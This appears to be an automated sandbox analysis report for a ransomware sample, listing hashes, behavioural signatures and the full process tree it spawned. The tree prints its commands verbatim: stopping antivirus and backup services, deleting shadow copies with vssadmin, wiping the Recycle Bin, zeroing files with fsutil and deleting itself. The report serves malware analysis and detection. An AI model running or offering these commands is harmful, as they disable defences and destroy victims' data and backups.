Analysis
-
max time kernel
135s -
max time network
137s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
17-04-2021 12:03
General
-
Target
admin.exe
-
Size
63KB
-
MD5
ae776cbf46e5d71831c0d0d6c37b3bbf
-
SHA1
3ee387589ef93afe4ed2609c0c242e29f5d164b4
-
SHA256
83e2ba9faf075547be65d2b6dbd13e190a0b1c1cf626788cb756ab7a3c770dcb
-
SHA512
486d0ce8e49b1ab0fd6a56d6982abad8661c35fb27343a623c7a58bf1f5a74ccff3a954d02e9713d501bb72e9dac829f459cad2f1b3cc225ce052568ee3785ee
Score
9/10
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 3 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\admin.exe"C:\Users\Admin\AppData\Local\Temp\admin.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\admin.exe2⤵
- Deletes itself
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txtMD5
4ba5aa5669a24362367192d751b7a597
SHA19beefe08e32db6e3efb3d1973fb29c4d5b8fa266
SHA25672550c492cc6e8d8dbb03ce554e77d5a94d39ebbc6af3f19b3d09da975f4959c
SHA512b5a81444ebd0530930dd99b164285a82e79064806e07519693aa286b2a539fd7260ac87e730a3ac6085f581b556fa8e6c72bce9d3516b27c52aef00c9617c3ed
-
memory/288-84-0x0000000000000000-mapping.dmp
-
memory/292-104-0x0000000000000000-mapping.dmp
-
memory/296-78-0x0000000000000000-mapping.dmp
-
memory/308-108-0x0000000000000000-mapping.dmp
-
memory/316-74-0x0000000000000000-mapping.dmp
-
memory/432-107-0x0000000000000000-mapping.dmp
-
memory/544-114-0x0000000000000000-mapping.dmp
-
memory/620-82-0x0000000000000000-mapping.dmp
-
memory/684-83-0x0000000000000000-mapping.dmp
-
memory/760-66-0x0000000000000000-mapping.dmp
-
memory/788-126-0x0000000000000000-mapping.dmp
-
memory/788-79-0x0000000000000000-mapping.dmp
-
memory/856-91-0x0000000000000000-mapping.dmp
-
memory/872-93-0x0000000000000000-mapping.dmp
-
memory/948-92-0x0000000000000000-mapping.dmp
-
memory/972-85-0x0000000000000000-mapping.dmp
-
memory/988-112-0x0000000000000000-mapping.dmp
-
memory/1000-99-0x0000000000000000-mapping.dmp
-
memory/1016-76-0x0000000000000000-mapping.dmp
-
memory/1016-101-0x0000000000000000-mapping.dmp
-
memory/1028-81-0x0000000000000000-mapping.dmp
-
memory/1036-111-0x0000000000000000-mapping.dmp
-
memory/1048-88-0x0000000000000000-mapping.dmp
-
memory/1100-100-0x0000000000000000-mapping.dmp
-
memory/1296-98-0x0000000000000000-mapping.dmp
-
memory/1300-97-0x0000000000000000-mapping.dmp
-
memory/1308-62-0x0000000000000000-mapping.dmp
-
memory/1340-63-0x0000000000000000-mapping.dmp
-
memory/1488-105-0x0000000000000000-mapping.dmp
-
memory/1504-67-0x0000000000000000-mapping.dmp
-
memory/1520-77-0x0000000000000000-mapping.dmp
-
memory/1560-73-0x0000000000000000-mapping.dmp
-
memory/1588-89-0x0000000000000000-mapping.dmp
-
memory/1596-103-0x0000000000000000-mapping.dmp
-
memory/1628-68-0x0000000000000000-mapping.dmp
-
memory/1640-96-0x0000000000000000-mapping.dmp
-
memory/1668-95-0x0000000000000000-mapping.dmp
-
memory/1696-72-0x0000000000000000-mapping.dmp
-
memory/1704-94-0x0000000000000000-mapping.dmp
-
memory/1720-70-0x0000000000000000-mapping.dmp
-
memory/1732-106-0x0000000000000000-mapping.dmp
-
memory/1748-109-0x0000000000000000-mapping.dmp
-
memory/1760-71-0x0000000000000000-mapping.dmp
-
memory/1776-102-0x0000000000000000-mapping.dmp
-
memory/1776-69-0x0000000000000000-mapping.dmp
-
memory/1796-87-0x0000000000000000-mapping.dmp
-
memory/1848-116-0x0000000000000000-mapping.dmp
-
memory/1864-110-0x0000000000000000-mapping.dmp
-
memory/1912-80-0x0000000000000000-mapping.dmp
-
memory/1948-60-0x00000000008F0000-0x00000000008F1000-memory.dmpFilesize
4KB
-
memory/1948-75-0x0000000002070000-0x0000000002071000-memory.dmpFilesize
4KB
-
memory/1968-86-0x0000000000000000-mapping.dmp
-
memory/1980-65-0x0000000000000000-mapping.dmp
-
memory/1992-64-0x0000000000000000-mapping.dmp
-
memory/2040-90-0x0000000000000000-mapping.dmp
-
memory/2128-113-0x0000000000000000-mapping.dmp
-
memory/2184-115-0x0000000000000000-mapping.dmp
-
memory/2248-117-0x0000000000000000-mapping.dmp
-
memory/2272-118-0x0000000000000000-mapping.dmp
-
memory/2296-119-0x0000000000000000-mapping.dmp
-
memory/2316-120-0x0000000000000000-mapping.dmp
-
memory/2364-121-0x0000000000000000-mapping.dmp
-
memory/2400-122-0x0000000000000000-mapping.dmp
-
memory/2424-123-0x0000000000000000-mapping.dmp
-
memory/2444-124-0x0000000000000000-mapping.dmp
-
memory/2472-125-0x0000000000000000-mapping.dmp
-
memory/2540-127-0x0000000075511000-0x0000000075513000-memory.dmpFilesize
8KB